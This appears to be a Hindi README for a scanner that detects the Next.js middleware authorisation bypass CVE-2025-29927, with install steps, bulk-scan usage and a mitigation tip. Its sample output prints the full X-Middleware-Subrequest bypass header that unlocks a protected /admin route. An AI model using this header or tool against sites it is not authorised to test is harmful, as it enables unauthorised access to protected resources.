
Next.js मिडलवेयर बाइपास स्कैनर
CVE-2025-29927 एक विशेष सुरक्षा उपकरण है जो Next.js मिडलवेयर बाईपास भेद्यता (CVE-2025-29927) का पता लगाने के लिए है, जो Next.js संस्करण 11.1.4 से 15.2.2 को प्रभावित करती है। यह गंभीर भेद्यता हमलावरों को एक विशेष रूप से तैयार HTTP हेडर भेजकर सुरक्षा नियंत्रणों को बायपास करने की अनुमति देती है।
Next.js मिडलवेयर बाईपास भेद्यता (CVE-2025-29927) हमलावरों को एक दुर्भावनापूर्ण X-Middleware-Subrequest हेडर भेजकर प्राधिकरण नियंत्रणों को दरकिनार करने की अनुमति देती है, जो मिडलवेयर प्रसंस्करण तर्क को भ्रमित करता है। इससे संरक्षित संसाधनों और मार्गों तक अनधिकृत पहुँच हो सकती है।
CVSS स्कोर: 9.1 (गंभीर)
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: स्कैन करने के लिए एकल लक्ष्य (जैसे, example.com या https://example.com)-f, --file: लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)-c, --concurrency: समवर्ती स्कैन की संख्या (डिफ़ॉल्ट: 5)-k, --insecure: SSL प्रमाणपत्र सत्यापन अक्षम करें (IP पतों के लिए उपयोगी)-s, --silent: साइलेंट मोड - केवल कमजोर लक्ष्य दिखाएँएकल लक्ष्य स्कैन करें:
python CVE-2025-29927.py -t example.com
फ़ाइल से एकाधिक लक्ष्य स्कैन करें:
python CVE-2025-29927.py -f targets.txt
SSL सत्यापन अक्षम करके स्कैन करें:
python CVE-2025-29927.py -t 192.168.1.1 -k
साइलेंट मोड के साथ स्वचालित स्कैनिंग:
python CVE-2025-29927.py -f targets.txt -k -s
कस्टम हेडर के साथ स्कैन करें:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
कमजोर लक्ष्यों के लिए, MiddleWay प्रदर्शित करता है:
उदाहरण आउटपुट:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
इस भेद्यता को कम करने के लिए:
X-Middleware-Subrequest हेडर को ब्लॉक करेंयह उपकरण केवल सुरक्षा अनुसंधान और रक्षात्मक उद्देश्यों के लिए प्रदान किया गया है। किसी भी ऐसे सिस्टम को स्कैन करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें जो आपके स्वामित्व में नहीं है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।
MIT